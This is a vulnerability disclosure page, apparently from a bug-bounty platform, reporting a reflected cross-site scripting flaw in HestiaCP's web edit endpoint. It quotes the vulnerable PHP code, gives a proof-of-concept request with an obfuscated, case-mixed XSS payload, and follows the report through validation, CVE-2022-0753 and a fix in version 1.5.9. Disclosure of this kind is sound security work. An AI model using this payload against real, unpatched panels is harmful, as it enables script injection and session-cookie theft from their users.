Cross-site Scripting (XSS) - Reflected in hestiacp/hestiacp

Valid

Reported on

Feb 17th 2022

Description

The user-controlled GET domain parameter in index.php is unsanitized resulting in Reflected Cross-Site Scripting.

Proof of Concept

Endpoint:

GET https://{HOST}/edit/web/

// File: /web/edit/web/index.php#L28

// List domain
$v_domain = $_GET['domain'];               // User controllable parameter
if ($_SESSION['userContext'] !== 'admin') {
    if (!in_array($v_domain, $user_domains)) {
        header("Location: /list/mail/");
        exit;
    }
}
Request:

GET https://{HOST}/edit/web/?domain=<htmL/+/OnpOintEReNTEr%0d=%0d["XSS-HERE"].find(confirm)//&token=01de3634f2469d87dab9b338eaff4863

Impact

This vulnerability is capable of running malicious Javascript code on web pages, stealing a user's cookie and gaining unauthorized access to that user's account through the stolen cookie.

We are processing your report and will contact the hestiacp team within 24 hours. a year ago
We have contacted a member of the hestiacp team and are waiting to hear back a year ago
We have sent a follow up to the hestiacp team. We will try again in 7 days. a year ago
Jaap Marcus validated this vulnerability a year ago
Faisal Fs ⚔️ has been awarded the disclosure bounty
The fix bounty is now up for grabs
Jaap Marcus
a year ago

@admin please provide a CVE for this vulnerability

Jamie Slome
a year ago

Admin

Sorted! 🎊

CVE-2022-0753

We have sent a fix follow up to the hestiacp team. We will try again in 7 days. a year ago
Jaap Marcus marked this as fixed in 1.5.9 with commit ee10e2 a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
to join this conversation